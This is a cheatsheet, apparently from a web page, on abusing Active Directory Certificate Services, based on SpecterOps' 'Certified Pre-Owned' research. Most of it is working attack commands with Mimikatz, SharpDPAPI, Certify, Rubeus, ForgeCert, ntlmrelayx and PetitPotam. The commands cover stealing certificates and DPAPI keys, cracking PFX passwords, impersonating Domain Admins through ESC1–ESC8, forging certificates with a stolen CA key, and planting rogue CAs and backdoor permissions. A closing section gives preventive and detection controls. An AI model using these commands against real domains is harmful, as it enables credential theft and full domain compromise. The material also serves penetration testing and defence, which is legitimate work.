AD CS "Certified Pre-Owned" Cheatsheet

Abusing Active Directory Certificate Services — Commands, Techniques & Defences

Based on the whitepaper by Will Schroeder & Lee Christensen (SpecterOps) · v1.0.1

THEFT1–5 PERSIST1–3 ESC1–8 DPERSIST1–3 PREVENT1–8 DETECT1–7

Background & Key Concepts
Authentication EKU OIDs
Certificate Enrollment Methods
AD CS Enumeration
Certificate Theft (THEFT1–5)
Account Persistence (PERSIST1–3)
Domain Escalation (ESC1–8)
Domain Persistence (DPERSIST1–3)
Defensive Guidance (PREVENT & DETECT)
Tool Reference

1. Background & Key Concepts

Active Directory Certificate Services (AD CS) is Microsoft's PKI implementation that integrates with Active Directory forests. It provides encryption, digital signatures, and — critically — user and machine authentication to AD. Although not installed by default, AD CS is widely deployed and is often misconfigured in ways that allow domain-level compromise.

Core Certificate Fields

Field	Description
Subject	Owner of the certificate (identity being certified).
SubjectAlternativeName (SAN)	One or more alternate names for the subject. Critically abused in ESC1/ESC6.
Extended Key Usages (EKUs)	OIDs that define what the certificate can be used for (e.g., authentication, code signing).
Issuer	The Certificate Authority (CA) that signed and issued the certificate.
NotBefore / NotAfter	Validity window of the certificate.
Basic Constraints	Indicates whether the certificate is a CA or end-entity certificate.
Signature	Signed by the issuing CA's private key to prove authenticity.

Key AD CS Containers (LDAP)

# All containers live under: CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM> # Sub-containers: CN=Certification Authorities # Trusted root CA certs CN=Enrollment Services # Enterprise CA objects (pKIEnrollmentService) CN=NTAuthCertificates # CAs allowed to authenticate to AD CN=AIA # Intermediate / cross CA certs CN=Certificate Templates # Template objects (pKICertificateTemplate)

The NTAuthCertificates object is the gatekeeper — only certificates issued by CAs listed here can authenticate to Active Directory. Adding a rogue CA here is the basis of DPERSIST2.

2. Authentication EKU OIDs

The following EKU OIDs, when present in a certificate, permit authentication to Active Directory. This is the core of most AD CS abuse scenarios.

Description	OID	Notes
Client Authentication	1.3.6.1.5.5.7.3.2	Most common auth EKU.
PKINIT Client Authentication	1.3.6.1.5.2.3.4	Must be added manually; not in default AD CS.
Smart Card Logon	1.3.6.1.4.1.311.20.2.2	Used for smart card / PKINIT auth.
Any Purpose	2.5.29.37.0	Allows any usage including auth.
No EKU (SubCA)	—	Subordinate CA cert; can authenticate.
Certificate Request Agent	1.3.6.1.4.1.311.20.2.1	Allows enrolling on behalf of others (ESC3).

Check EKUs on a Certificate (PowerShell)

$CertPath = "C:\path\to\cert.pfx" $CertPass = "P@ssw0rd" $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($CertPath, $CertPass) $Cert.EnhancedKeyUsageList

Check EKUs with certutil

certutil.exe -dump -v cert.pfx

3. Certificate Enrollment Methods

Clients can request certificates from an Enterprise CA via several interfaces. Each interface represents a potential attack surface.

Method	Protocol	URL / Interface
DCOM (default)	MS-WCCE	COM interfaces on the CA server
RPC / Named Pipes	MS-ICPR	Named pipes or TCP/IP
Web Enrollment	HTTP/HTTPS	`http://<CA>/certsrv/`
Certificate Enrollment Web Service (CES)	MS-WSTEP (SOAP)	`https://<CES>/<CA>_CES_Kerberos/service.svc`
Network Device Enrollment (NDES)	SCEP	`http://<NDES>/CertSrv/mscep/`

GUI Enrollment

# User certificates certmgr.msc → Personal → Certificates → All Tasks → Request New Certificate # Machine certificates certlm.msc → Personal → Certificates → All Tasks → Request New Certificate

Command-Line Enrollment

# Using certreq.exe certreq.exe -submit -config "CA-SERVER\CA-NAME" request.inf cert.cer # Using PowerShell Get-Certificate -Template "User" -CertStoreLocation Cert:\CurrentUser\My

Convert PEM to PFX (OpenSSL)

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

4. AD CS Enumeration

Thorough enumeration of CAs and certificate templates is the foundation of any AD CS assessment. The primary tools are Certify, certutil, and PSPKIAudit.

Enumerate Certificate Authorities

# Certify — list Enterprise CAs and published templates Certify.exe cas # certutil — list CAs certutil.exe -TCAInfo # PSPKIAudit (PowerShell) Import-Module PSPKIAudit Invoke-PKIAudit

Enumerate Certificate Templates

# Certify — all published templates with permissions Certify.exe find # Certify — only templates enrollable for client auth Certify.exe find /clientauth # Certify — templates likely vulnerable to domain escalation Certify.exe find /vulnerable # certutil — detailed template info certutil.exe -v -dstemplate

LDAP Query for ESC1-Vulnerable Templates

# Finds templates with no approval, auth EKU, and CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (&(objectclass=pkicertificatetemplate) (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2)) (|(mspki-ra-signature=0)(!(mspki-ra-signature=*))) (|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2) (pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4) (pkiextendedkeyusage=2.5.29.37.0) (!(pkiextendedkeyusage=*))) (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))

View CA Security Descriptor (Remote Registry)

# Registry path on CA server HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA NAME>\Security # Read remotely with reg.exe reg.exe query \\<CA-SERVER>\HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA NAME>

5. Certificate Theft

THEFT1 Export via Crypto APIs

If a private key is marked exportable, it can be extracted directly. For non-exportable keys, Mimikatz can patch CAPI/CNG in memory to force exportability.

# PowerShell — export exportable cert $cert = Get-Item Cert:\CurrentUser\My\<thumbprint> Export-PfxCertificate -Cert $cert -FilePath C:\out\cert.pfx -Password (ConvertTo-SecureString "pass" -AsPlainText -Force) # Mimikatz — patch CAPI (current process) crypto::capi # Mimikatz — patch CNG (patches lsass.exe) crypto::cng # Mimikatz — export all machine certs after patching crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT2 User Certificate Theft via DPAPI

User private keys are stored DPAPI-encrypted under %APPDATA%\Microsoft\Crypto\RSA\<User SID>\. Decryption requires the user's DPAPI master key.

# SharpDPAPI — decrypt using domain backup key SharpDPAPI.exe certificates /pvk:<domain_backup_key.pvk> # SharpDPAPI — decrypt using known password SharpDPAPI.exe certificates /password:<user_password> # SharpDPAPI — decrypt using explicit masterkey file SharpDPAPI.exe certificates /mkfile:<path_to_masterkey> /password:<password> # Mimikatz — retrieve masterkey via RPC dpapi::masterkey /in:"C:\PATH\TO\MASTERKEY" /rpc # Mimikatz — decrypt masterkey with password dpapi::masterkey /in:"C:\PATH\TO\MASTERKEY" /sid:<account_sid> /password:<password> # Convert resulting PEM to PFX openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

THEFT3 Machine Certificate Theft via DPAPI

Machine private keys are stored under %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys\. The DPAPI_SYSTEM LSA secret (accessible only as SYSTEM) is required for decryption.

# SharpDPAPI — auto-elevate to SYSTEM and dump machine certs SharpDPAPI.exe certificates /machine # Mimikatz — dump DPAPI_SYSTEM LSA secret lsadump::secrets # Mimikatz — export machine certs after patching CNG crypto::cng crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT4 Finding Certificate Files on Disk

Certificates are sometimes left on file systems, shares, or source code repositories. Common file extensions to search for are listed below.

Extension	Contents
`.pfx` / `.p12`	Certificate + private key (PKCS#12). Usually password-protected.
`.pem`	Base64-encoded certificate and/or private key.
`.key`	Private key only.
`.crt` / `.cer`	Certificate only (no private key).
`.jks` / `.keystore`	Java Keystore — may contain certs and private keys.
`.csr`	Certificate Signing Request — no cert or key.

# PowerShell — recursive search Get-ChildItem -Path C:\ -Recurse -Include *.pfx,*.p12,*.pem,*.key,*.crt,*.cer -ErrorAction SilentlyContinue # Seatbelt — search C:\ up to 10 levels deep Seatbelt.exe dir C:\ 10 "\.(pfx|pem|p12)$" false # Crack a password-protected PFX with JohnTheRipper pfx2john.py cert.pfx > cert.hash john cert.hash --wordlist=rockyou.txt

THEFT5 NTLM Credential Theft via PKINIT

When a TGT is obtained via PKINIT (certificate-based Kerberos), the KDC embeds the account's NTLM hash in the PAC. This hash can be extracted and used for pass-the-hash or cracking.

# Kekeo — extract NTLM hash from a PKINIT TGT tgt::pac /in:<path_to_tgt.kirbi> # Rubeus — request TGT with certificate and extract NTLM Rubeus.exe asktgt /user:<user> /certificate:<base64_cert> /getcredentials

6. Account Persistence

PERSIST1 User Account Persistence via Certificate Request

Request a certificate for the current user from a template that allows domain authentication. The certificate remains valid (and usable for authentication) even after a password reset.

# Step 1 — Find enrollable templates with client auth EKU Certify.exe find /clientauth # Step 2 — Request a certificate Certify.exe request /ca:CA-SERVER\CA-NAME /template:User # Step 3 — Convert PEM output to PFX openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx # Step 4 — Use certificate to request a TGT with Rubeus Rubeus.exe asktgt /user:<username> /certificate:cert.pfx /password:<pfx_password> /ptt

PERSIST2 Machine Account Persistence via Certificate Request

Enroll the machine account in a certificate template that allows Domain Computers. Persistence survives system reimages (if the machine account name is reused) and password rotations.

# Certify — enroll as machine account (auto-elevates to SYSTEM) Certify.exe request /ca:CA-SERVER\CA-NAME /template:Machine /machine # Rubeus — request TGT for machine account Rubeus.exe asktgt /user:<MACHINE$> /certificate:cert.pfx /password:<pfx_password> /ptt

PERSIST3 Account Persistence via Certificate Renewal

Renew a certificate before it expires to silently extend access without requesting a new certificate (which would leave additional artifacts on the CA).

# certreq.exe — renew a user certificate certreq.exe -renew -cert <thumbprint> renewed.cer # certreq.exe — renew a machine certificate certreq.exe -renew -machine -cert <thumbprint> renewed.cer

7. Domain Escalation

ESC1 Misconfigured Template — Enrollee Supplies Subject

A template is vulnerable when: low-privileged users can enroll, no manager approval is required, an auth EKU is present, and the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set. This allows any enrollee to specify an arbitrary SAN (e.g., a Domain Admin UPN).

# Find vulnerable templates Certify.exe find /vulnerable # Exploit — request cert as Domain Admin Certify.exe request /ca:CA-SERVER\CA-NAME /template:VulnTemplate /altname:Administrator@corp.local # Convert and use openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /password:<pfx_password> /ptt

ESC2 Misconfigured Template — Any Purpose / No EKU

A template with the Any Purpose EKU or no EKU (SubCA) and low-privileged enrollment rights. Even without CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, these certs can authenticate to AD as the requesting user, and can be used as a Certificate Request Agent (see ESC3).

# Enumerate — Any Purpose or no-EKU templates Certify.exe find /vulnerable # Enroll and authenticate as self Certify.exe request /ca:CA-SERVER\CA-NAME /template:AnyPurposeTemplate

ESC3 Misconfigured Enrollment Agent Template

A template with the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1) and no enrollment agent restrictions allows a low-privileged user to request certificates on behalf of any other user.

# Step 1 — Obtain a Certificate Request Agent certificate Certify.exe request /ca:CA-SERVER\CA-NAME /template:EnrollmentAgentTemplate # Step 2 — Use agent cert to enroll on behalf of a Domain Admin Certify.exe request /ca:CA-SERVER\CA-NAME /template:User /onbehalfof:corp\Administrator /enrollcert:agent.pfx /enrollcertpw:<password>

ESC4 Vulnerable Certificate Template Access Control

If a low-privileged user has WriteDACL, WriteOwner, or WriteProperty rights on a template object, they can reconfigure it to be vulnerable (e.g., add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or a dangerous EKU).

# Check template ACLs with Certify Certify.exe find # Modify template with PowerView (add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) Set-DomainObject -Identity "VulnTemplate" -Set @{'mspki-certificate-name-flag'=1} -Verbose

ESC5 Vulnerable PKI AD Object Access Control

Write access to other AD CS-related objects (e.g., the Enterprise CA object, the NTAuthCertificates object, or the PKI container itself) can allow an attacker to compromise the entire PKI.

# Enumerate ACLs on PKI objects with PowerView Get-DomainObjectAcl -SearchBase "CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -ResolveGUIDs

ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag on CA

When this flag is set on a CA, any certificate request can include a user-specified SAN, regardless of template settings. Combined with any enrollable auth template, this allows domain escalation.

# Check if flag is set certutil.exe -config "CA-SERVER\CA-NAME" -getreg "policy\EditFlags" # Exploit — request cert with arbitrary SAN Certify.exe request /ca:CA-SERVER\CA-NAME /template:User /altname:Administrator@corp.local # Remediation — disable the flag certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

ESC7 Vulnerable Certificate Authority Access Control

Principals with Manage CA rights can change CA settings (e.g., enable ESC6). Principals with Issue and Manage Certificates rights can approve pending certificate requests, bypassing manager approval requirements.

# Enumerate CA permissions Certify.exe cas # Approve a pending certificate request (requires Issue and Manage Certificates) Certify.exe approve /ca:CA-SERVER\CA-NAME /request:<request_id> # Enable EDITF_ATTRIBUTESUBJECTALTNAME2 (requires Manage CA) certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2

ESC8 NTLM Relay to AD CS HTTP Endpoints

If the AD CS web enrollment endpoint (/certsrv/) is accessible and does not require HTTPS or EPA, an attacker can relay NTLM authentication from a privileged account (e.g., a DC) to obtain a certificate for that account.

# Start relay targeting AD CS web enrollment impacket-ntlmrelayx -t http://<adcs-server>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController # Trigger NTLM auth from a DC (e.g., via printerbug / petitpotam) python3 PetitPotam.py -u <user> -p <pass> <attacker_ip> <dc_ip> # Use the obtained base64 certificate with Rubeus Rubeus.exe asktgt /user:<DC$> /certificate:<base64_cert> /ptt

8. Domain Persistence

DPERSIST1 Certificate Forgery with Stolen CA Private Key

If a CA's private key is not hardware-protected, it can be extracted via DPAPI. The stolen key can then be used with ForgeCert to forge certificates for any principal in the domain. Forged certificates cannot be revoked as long as the CA certificate is valid.

# Step 1 — Extract CA private key with SharpDPAPI (run as SYSTEM on CA) SharpDPAPI.exe certificates /machine # Step 1 (alt) — Extract with Mimikatz crypto::cng crypto::certificates /export /systemstore:LOCAL_MACHINE # Step 2 — Forge a certificate for any user ForgeCert.exe /CA:ca.pfx /CAPassword:<password> /Subject:"CN=Administrator" /SubjectAltName:Administrator@corp.local /Template:User /NewCertPassword:<new_password> /OutFile:forged.pfx # Step 3 — Use forged cert to get a TGT Rubeus.exe asktgt /user:Administrator /certificate:forged.pfx /password:<new_password> /ptt

DPERSIST2 Trusting Rogue CA Certificates

An attacker with sufficient privileges can add a rogue CA certificate to the NTAuthCertificates AD object and the enterprise trust stores, allowing them to issue certificates that AD will trust for authentication.

# Add rogue CA to NTAuth store certutil.exe -dspublish -f rogue_ca.cer NTAuthCA # Add rogue CA to root CA store certutil.exe -dspublish -f rogue_ca.cer RootCA # Verify with Certify Certify.exe cas

DPERSIST3 Malicious Misconfigurations for Future Escalation

An attacker with CA or template write access can introduce misconfigurations (e.g., enable EDITF_ATTRIBUTESUBJECTALTNAME2, weaken template ACLs) that can be exploited later, even after losing initial access.

# Enable EDITF_ATTRIBUTESUBJECTALTNAME2 for future ESC6 abuse certutil -config "CA-SERVER\CA-NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2 # Grant a controlled user WriteDACL on a template (PowerView) Add-DomainObjectAcl -TargetIdentity "VulnTemplate" -PrincipalIdentity "backdoor_user" -Rights WriteDacl

9. Defensive Guidance

Preventive Controls

ID	Control	Key Action / Command
PREVENT1	Treat CAs as Tier 0 Assets	Apply DC-level security controls to all CA servers and subordinate CAs.
PREVENT2	Harden CA Settings	`certutil -config "CA\NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2`; restrict "Manage CA" and "Issue and Manage Certificates" rights.
PREVENT3	Audit Published Templates	Remove unused templates from all CAs. Use `Certify.exe find` or `certutil -TCAInfo`.
PREVENT4	Harden Template Settings	Disable "Supply in the request"; enable manager approval; restrict enrollment to least-privilege groups; minimise EKUs.
PREVENT5	Audit NTAuthCertificates	`certutil -viewdelstore "ldap:///CN=NtAuthCertificates..."`; remove unnecessary CA certs.
PREVENT6	Secure Private Key Storage	Use HSMs for CA keys; enable TPM attestation for client keys; enable Credential Guard.
PREVENT7	Enforce Strict User Mappings	Set `HKLM\SYSTEM\CurrentControlSet\Services\Kdc\UseSubjectAltName = 0` on DCs to disable SAN-based mapping.
PREVENT8	Harden HTTP Enrollment Endpoints	Require HTTPS + EPA on `/certsrv/`; disable if not needed; restrict access to authorised hosts.

Disable SAN Mapping (PREVENT7)

# On each Domain Controller — disable SAN-based Kerberos mapping reg add HKLM\SYSTEM\CurrentControlSet\Services\Kdc /v UseSubjectAltName /t REG_DWORD /d 0 /f # On each Domain Controller — disable SAN-based SChannel mapping reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel /v CertificateMappingMethods /t REG_DWORD /d 0x1F /f

Audit NTAuthCertificates (PREVENT5)

# View certificates in NTAuth store certutil -viewstore "ldap:///CN=NtAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local?cACertificate?base?objectclass=certificationAuthority" # Remove a certificate by thumbprint (PSPKI PowerShell module) Install-Module PSPKI -Scope CurrentUser Import-Module PSPKI Get-AdPkiContainer -ContainerType NTAuth | Remove-AdCertificate -Thumbprint "EC9385E533782453D5C285B2A67311447FB57A6F" -Dispose

Detective Controls — Windows Event IDs

Event ID	Description	Relevant Technique
`4886`	Certificate Services received a certificate request.	PERSIST1, PERSIST2, ESC1–ESC8
`4887`	Certificate Services approved a certificate request and issued a certificate.	PERSIST1, PERSIST2, ESC1–ESC8
`4888`	Certificate Services denied a certificate request.	PERSIST1, PERSIST2
`4870`	Certificate Services revoked a certificate.	Incident Response
`4882`	The security permissions for Certificate Services were changed.	ESC4, ESC5, ESC7
`4898`	Certificate Services loaded a template.	ESC4, DPERSIST3
`4768`	A Kerberos authentication ticket (TGT) was requested.	THEFT5, PERSIST1, ESC1
`4769`	A Kerberos service ticket was requested.	PERSIST2 (S4U2Self)
`4776`	The computer attempted to validate the credentials for an account.	THEFT5 (NTLM from PKINIT)
`5136`	A directory service object was modified.	ESC4, ESC5, DPERSIST2, DPERSIST3

Detective Controls Summary

ID	Control	What to Monitor
DETECT1	Monitor Certificate Enrollments	Event IDs 4886, 4887 on CA servers; alert on unusual template usage or high-volume requests.
DETECT2	Monitor Certificate Authentication	Event ID 4768 with `Pre-Authentication Type: 16` (PKINIT); alert on cert auth for sensitive accounts.
DETECT3	Monitor CA Backup Events	Event IDs 4876, 4877 on CA servers; unexpected backups may indicate key theft attempts.
DETECT4	Monitor Template Modifications	Event ID 4898 (template loaded) and 5136 (AD object modified) for certificate template objects.
DETECT5	Monitor DPAPI Key Reads	Audit access to `%APPDATA%\Microsoft\Crypto\` and `%ALLUSERSPROFILE%\...\MachineKeys\`.
DETECT6	Use Honey Credentials	Deploy honey certificates with auth EKUs; alert on any authentication attempt using them.
DETECT7	Miscellaneous	Monitor for `certutil.exe` invocations with `-dspublish`, `-setreg`, or `-backup` flags.

10. Tool Reference

Tool	Purpose	Key Commands
Certify	AD CS enumeration and certificate requests (C#, GhostPack)	`cas`, `find`, `find /vulnerable`, `request`, `approve`
Rubeus	Kerberos abuse toolkit; supports PKINIT certificate auth (C#, GhostPack)	`asktgt /certificate:...`, `s4u`, `describe`
SharpDPAPI	DPAPI decryption; extracts user and machine certificates (C#, GhostPack)	`certificates`, `certificates /machine`, `masterkeys`
ForgeCert	Forge certificates using a stolen CA private key (C#, GhostPack)	`/CA:ca.pfx /SubjectAltName:user@domain /OutFile:forged.pfx`
Mimikatz	Credential extraction; CAPI/CNG patching; DPAPI operations	`crypto::capi`, `crypto::cng`, `crypto::certificates`, `dpapi::masterkey`
Kekeo	Kerberos manipulation; PKINIT to NTLM hash extraction	`tgt::pac`, `tgt::ask`
PSPKIAudit	PowerShell AD CS auditing tool (GhostPack)	`Invoke-PKIAudit`
certutil.exe	Built-in Windows CA management and certificate utility	`-TCAInfo`, `-v -dstemplate`, `-dump -v cert.pfx`, `-setreg`, `-backup`
certreq.exe	Built-in Windows certificate request tool	`-submit`, `-renew`, `-retrieve`
Seatbelt	Host enumeration and triage (C#, GhostPack)	`dir`, `FindInterestingFiles`
impacket-ntlmrelayx	NTLM relay attacks; supports AD CS web enrollment relay (ESC8)	`-t http://<adcs>/certsrv/certfnsh.asp --adcs`
openssl	Certificate format conversion (PEM ↔ PFX)	`pkcs12 -in cert.pem -export -out cert.pfx`